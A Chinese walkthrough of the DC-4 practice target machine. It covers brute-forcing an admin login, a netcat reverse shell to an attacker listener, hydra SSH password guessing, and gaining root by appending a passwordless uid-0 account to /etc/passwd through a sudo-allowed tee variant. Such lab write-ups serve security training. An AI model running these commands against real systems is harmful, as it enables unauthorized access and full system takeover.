首页
学习
活动
专区
圈层
工具
发布

靶机渗透DC-4

拿来就给出一个网站,其他的啥也没给。

001

最初想法是御剑扫描一下,但是发现也没什么有用的信息,还是只有一个管理登录框。

那就爆破吧······

002

成功爆到一个密码。

(Ps:平时要积累字典啊,用的时候现去找的·····)

登陆后台。

003

发现可以进行命令执行,抓包看看。

004

这里可以利用啊。执行个whoami看看。

005

可以执行。

接下来使用nc监听反弹shell。

代码语言:javascript
复制
nc -lnvp 444
nc -e /bin/bash 192.168.70.154 444

006

然后在目录里翻翻。在home目录里看到两个用户。在jim的用户目录里找到了密码的线索。

007

然后hydra爆破

代码语言:javascript
复制
hydra -l jim -P jim.txt ssh://192.168.70.158

008

成功爆到密码。

SSH登陆账户。

009

随便看看。

010

呦,mbox是root用户发来的。

看了下test.sh.

011

继续翻目录,在var/mails目录下找到了jim文件,查看。

012

是charles发给jim的信息,透露了Password。

直接切换到charles用户。

013

sudo -l看看。

014

哎嘿,出来了路径。

teehee -help发现-a命令执行命令追加文件内容,不用进行覆盖。

代码语言:javascript
复制
echo "hack::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

015
代码语言:javascript
复制
用户名-hack
是否有密码—空
uid—0——root权限
用户信息记录位置—空
家目录—空
登录的命令解释器–/bin/bash

直接su hack,不用密码即可登陆,直接是root权限。cat flag即可。

016

这一关卡在于最后的teehee追加文件内容。

下一篇
举报
领券